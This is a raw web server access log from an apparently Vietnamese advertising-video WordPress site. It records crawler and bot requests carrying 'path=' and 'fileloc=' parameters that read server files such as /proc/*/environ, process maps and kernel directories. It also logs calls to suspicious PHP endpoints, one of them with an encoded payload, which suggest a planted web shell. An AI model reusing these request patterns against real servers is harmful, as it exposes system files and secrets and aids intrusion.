74.7.227.189 - - [10/Nov/2025:01:03:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory4/node0/cpu0 HTTP/1.1" 200 3445 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:12 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/cpuset&path=//proc/689 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:12 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/schedstat&path=//proc/659 HTTP/1.1" 200 2632 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:13 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/pagemap&path=//proc/689 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:03:13 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Fdrivers%2Fnet%2Fethernet%2Fsamsung HTTP/1.1" 200 3117 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:01:03:13 +0000] "GET /150etr3606.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:01:03:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/cpu1/node0/cpu1 HTTP/1.1" 200 3478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:14 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/sched&path=//proc/664 HTTP/1.1" 200 3009 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.204.150.196 - - [10/Nov/2025:01:03:15 +0000] "GET /our-works/phim-viral-ila/?fileloc=//proc/1/arch_status&path=//proc/1 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:03:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/sessionid&path=//proc/659 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/oom_score&path=//proc/664 HTTP/1.1" 200 2613 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/environ&path=//proc/689 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/patch_state&path=//proc/664 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/patch_state&path=//proc/661 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:17 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/environ&path=//proc/689 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:17 +0000] "GET /269tcq7993.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:01:03:17 +0000] "GET /our-works/tv-commercial/'?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-includes%2Fblock-supports%2Fshadow.php&path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-includes%2Fblock-supports HTTP/1.1" 200 3374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:01:03:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory7/node0/cpu0 HTTP/1.1" 200 3445 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:18 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/syscall&path=//proc/659 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:18 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/patch_state&path=//proc/689 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:19 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/oom_score_adj&path=//proc/664 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:20 +0000] "GET /97zrz45299.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:01:03:20 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fxen%2Fgntdev HTTP/1.1" 200 3014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:01:03:20 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu1/node0/memory9 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:20 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/smaps&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:21 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/gid_map&path=//proc/689 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:21 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/gid_map&path=//proc/689 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:22 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/personality&path=//proc/664 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.225.243.131 - - [10/Nov/2025:01:03:23 +0000] "GET /our-works/tvc-kimino/?fileloc=//sys/module/joydev/coresize&path=//sys/module/joydev HTTP/1.1" 200 2625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
54.156.124.2 - - [10/Nov/2025:01:03:24 +0000] "GET /our-works/tvc-kimino/?path=//usr/share/doc/ubuntu-advantage-tools HTTP/1.1" 200 3021 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:03:24 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/sessionid&path=//proc/659 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:25 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/personality&path=//proc/689 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:25 +0000] "GET /95vlri38293.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:26 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/setgroups&path=//proc/659 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:03:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory14/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:27 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/personality&path=//proc/661 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:03:27 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Fdrivers%2Fnet%2Fethernet%2Fvia HTTP/1.1" 200 3047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:03:28 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/smaps_rollup&path=//proc/661 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/pagemap&path=//proc/664 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/timers&path=//proc/659 HTTP/1.1" 500 627 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:30 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/io&path=//proc/689 HTTP/1.1" 200 2603 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:30 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/io&path=//proc/689 HTTP/1.1" 200 2603 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.234.206.30 - - [10/Nov/2025:01:03:31 +0000] "GET /our-works/intracom-riverside/?path=//sys/module/configfs HTTP/1.1" 200 2990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:01:03:31 +0000] "GET /60hza37502.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:32 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/projid_map&path=//proc/689 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:03:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory14/node0 HTTP/1.1" 200 3951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/projid_map&path=//proc/664 HTTP/1.1" 200 2626 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.235.215.92 - - [10/Nov/2025:01:03:33 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?path=//usr/share/calendar/de_AT HTTP/1.1" 200 2960 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:01:03:35 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Flib%2Fsystemd%2Fsystemd-localed&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Flib%2Fsystemd HTTP/1.1" 200 2648 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:03:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/projid_map&path=//proc/661 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/patch_state&path=//proc/664 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/schedstat&path=//proc/664 HTTP/1.1" 200 2627 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:37 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/smaps&path=//proc/659 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:37 +0000] "GET /74tta34184.html?path=/var/www/lamphim/data/logs HTTP/1.1" 200 5440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:37 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/limits&path=//proc/689 HTTP/1.1" 200 2870 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.225.98.148 - - [10/Nov/2025:01:03:37 +0000] "GET /our-works/intracom-riverside/?path=//var/www/trangchihere HTTP/1.1" 200 2669 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [10/Nov/2025:01:03:38 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323734303039382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733363439382q3034633938326261356131353061666433656463623131636238333132343035222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:01:03:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/timerslack_ns&path=//proc/659 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:03:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/cpu0/node0/memory5 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/limits&path=//proc/689 HTTP/1.1" 200 2870 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/sched&path=//proc/689 HTTP/1.1" 200 3015 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
69.197.179.242 - - [10/Nov/2025:01:03:38 +0000] "GET /wp-includes/addc3d4c/edit.php?id=336228 HTTP/1.1" 499 0 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=336228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
51.77.43.178 - - [10/Nov/2025:01:03:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/sched&path=//proc/664 HTTP/1.1" 200 3008 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/stack&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/setgroups&path=//proc/659 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.195.145.102 - - [10/Nov/2025:01:03:39 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/class/bdi/7:2 HTTP/1.1" 200 3210 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:01:03:40 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fdoc%2Fpython3-apport%2Fcopyright&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fdoc%2Fpython3-apport HTTP/1.1" 200 3032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:01:03:40 +0000] "GET /49zpt20845.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/personality&path=//proc/664 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/sched&path=//proc/661 HTTP/1.1" 200 3027 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:03:40 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/cpu1/node0/memory4 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.212.145.46 - - [10/Nov/2025:01:03:41 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/class/bdi/7:2 HTTP/1.1" 200 3210 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:03:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/smaps_rollup&path=//proc/659 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/loginuid&path=//proc/689 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:43 +0000] "GET /60hza37502.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:01:03:43 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Flib%2Fzstd%2FMakefile&path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Flib%2Fzstd HTTP/1.1" 200 2817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:03:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/schedstat&path=//proc/689 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:03:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory4/node0/cpu1 HTTP/1.1" 200 3483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/loginuid&path=//proc/689 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:45 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/projid_map&path=//proc/664 HTTP/1.1" 200 2626 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/uid_map&path=//proc/659 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/smaps&path=//proc/659 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:47 +0000] "GET /221fwd1297.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:47 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/schedstat&path=//proc/664 HTTP/1.1" 200 2627 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
98.82.38.120 - - [10/Nov/2025:01:03:47 +0000] "GET /our-works/tvc-lapatie-2/?path=//lib/python3/dist-packages/PyNaCl-1.3.0.egg-info HTTP/1.1" 200 3174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:01:03:47 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/cpu1/node0/memory3 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/maps&path=//proc/689 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/schedstat&path=//proc/661 HTTP/1.1" 200 2629 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/sessionid&path=//proc/689 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:03:51 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fkernel%2Fdrivers%2Fuio%2Fuio.ko&path=%2F%2Flib%2Fmodules%2F5.4.0-214-generic%2Fkernel%2Fdrivers%2Fuio HTTP/1.1" 200 2651 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:03:51 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/stack&path=//proc/659 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:52 +0000] "GET /97zrz45299.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/sched&path=//proc/664 HTTP/1.1" 200 3009 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:53 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/stat&path=//proc/661 HTTP/1.1" 200 2711 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:03:53 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu1/node0/memory7 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
